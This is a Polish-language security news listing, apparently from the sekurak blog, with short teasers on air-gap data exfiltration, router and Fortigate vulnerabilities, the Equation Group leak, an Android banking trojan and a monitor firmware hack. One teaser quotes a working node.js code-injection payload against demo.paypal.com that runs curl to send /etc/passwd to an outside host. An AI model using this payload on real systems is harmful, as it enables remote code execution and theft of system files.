Ciekawy research z Izraela, pokazujący jak można wysyłać dane z komputera, który jest fizycznie odseparowany od innych sieci. Całość polega na wykorzystaniu odpowiedniego oprogramowania, które potrafi z niemodyfikowanego pendrajwa zrobić nadajnik radiowy. Projekt działa na relatywnie niewielkie odległości i udało się osiągnąć prędkość transmisji rzędu 20-80 bajtów na sekundę. Przykładową instalację…
Czytaj dalej »
Zapraszam na listopadową konferencję PolCAAT, nad którą sekurak objął patronat. Również będzie tam moja prezentacja dotycząca hackowania sprzętu. Jak dobrze pójdzie zobaczycie na żywo hackowanie CCTV – to jeden z efektów które będę chciał pokazać na jednym z bardziej enterprajsowych dostawców kamer: Całość organizuje Instytut Audytorów Wewnętrznych IIA Polska, a…
Czytaj dalej »
O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com. Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie: Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego): https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(’child_process’).exec(’curl+-F+”x=`cat+/etc/passwd`”+artsploit.com’)-’ –Michał Sajdak
Czytaj dalej »
Tym razem bohaterem jest router przywieziony z Chin: Rzadko zdarzają się tak dokładne analizy różnych problemów bezpieczeństwa na urządzeniach sieciowych – tym razem mamy dostęp m.in. dostęp do roota przez podanie odpowiedniej nazwy ciastka + eskalację poprzez wstrzyknięcie do wykonania traceroute. Z ciekawostek – w routerze jest zainstalowany privoxy, potrafiący pozytywnie…
Czytaj dalej »
Dostępne w PDF, są i bardziej techniczne i bardziej ogólne (z dużym wstępem dotyczącym np. analizy ryzyka). Idealne dla osób, które chciałyby wejść w tematykę testów penetracyjnych lub doświadczonych pentesterów (zawsze coś można podpatrzeć, no nie? ;-) –ms
Czytaj dalej »
Nie tylko Cisco ale również inni producenci łatają się po ostatnim wycieku ze skackowania NSA. Fortigate zapatchował właśnie w swoich starszych produktach buffer overflow w… parserze ciasteczek. Podatność umożliwia zdalnie otrzymanie uprawnień admina, i oznaczona została priorytetem High. Prawdopodobnie do wykorzystania podatności wystarczy nieuwierzytelniony dostęp do interfejsu webowego urządzenia. Cisco też nie pozostaje…
Czytaj dalej »
Tego jeszcze chyba nie było ;) Jak wprowadzić w przeglądarce adres, który dla użytkownika będzie wyglądał mało podejrzanie, np. w pasku URL mamy: google.com/blablabla, ale przeglądarka wykonuje komunikację do innego niż Google adresu IP? Można to wymusić za pomocą kodowania znanego np. w j. arabskim (czytamy tam od prawej do lewej)….
Czytaj dalej »
Wczoraj pisaliśmy o wycieku z grupy hackerskiej powiązanej z NSA, a tymczasem dostępny jest opis działania jednego z exploitu, udostępnionego bezpłatnie w ramach dema. Nie jest to jakaś wywracająca świat rzecz (ta jest :) , ale przy znajomości community string (można próbować też użyć domyślnego) do SNMP można zalogować się…
Czytaj dalej »
Przeglądasz sobie ulubioną stronę – a tu nagle boom i pokazuje się request o przydzielenie praw admina do aplikacji last-browser-update.apk: Całość jest malwarem bankowym, który jak relacjonują ludzie z Kasperskiego, był serwowany z wykorzystaniem Google Adsense. Trojan-Banker.AndroidOS.Svpeng.q potrafi m.in. serwować lewe ekrany do logowania dla bankowości internetowych i oczywiście kraść hasła: Na…
Czytaj dalej »
Sprawa jest dość niejasna: na tumblerze pojawiło się wczoraj ogłoszenie sprzedaży paczki exploitów należących do Equation Group, z produkcją znanych zaawansowanych malware-ów przemysłowych ostatnich lat: Stuxnet czy Flame. Co więcej, w ramach zachęty udostępniono 256 MB paczkę demo zdobytych danych. Jak pisze ARS: Samples of the stolen files are dated most recently…
Czytaj dalej »
Zapraszamy na kolejne spotkanie dla administratorów sieciowych i systemowych – SysOps / DevOps Polska MeetUp, które odbędzie się w najbliższy czwartek, 18 sierpnia o godz. 18:00 w sali konferencyjnej na 7. piętrze w budynku AVIVA (Gdański Business Center, budynek C, ul. Inflancka 4b), w Warszawie. Dwa słowa od samych organizatorów:…
Czytaj dalej »
Datasploit poszukuje publicznie dostępnych: e-maili, loginów, telefonów. Wszystko w oparciu o bazy: Facebooka, Shodana, Censys, whois; nie brakuje też poszukiwania domen i (poddomen). –ms
Czytaj dalej »
Były już różne techniki wycieku danych nietypowymi kanałami – jak choćby poprzez mierzenie emisji elektromagnetycznych (działa nawet przez 15cm zbrojoną ścianę) czy sterowanie wentylatorami. Tym razem wydaje się, że mamy coś nowego – można pobierać pewne dane z potencjalnie zupełnie odizolowanego systemu – za pomocą odpowiedniego kontrolowania dysku twardego: A…
Czytaj dalej »
Artykuł wiodący sierpniowego, 150., wydania „Linux Magazine” – z odświeżoną grafiką – dotyczy scentralizowanego zarządzania plikami dziennika systemowego: opisuje, jak skonfigurować monitorowanie sieci bazujące na serwerze logów Graylog. Dołączone DVD po raz pierwszy zawiera Manjaro, w wersji 16.06. Wewnątrz wydania również: trwałe Iptables, czyli automatyczne przywracanie reguł zapory sieciowej, skuteczne…
Czytaj dalej »
Interesująca praca zaprezentowana na tegorocznym Defconie. Okazuje się, że w monitorze Della 2410U (ale potencjalnie również u innych producentów) znajduje się display controller, który de facto jest małym komputerem (z własnym firmware). W ramach PoC badacze zmienili stan konta w Paypal na $1 000 000 (de facto zmienili tylko piksele…
Czytaj dalej »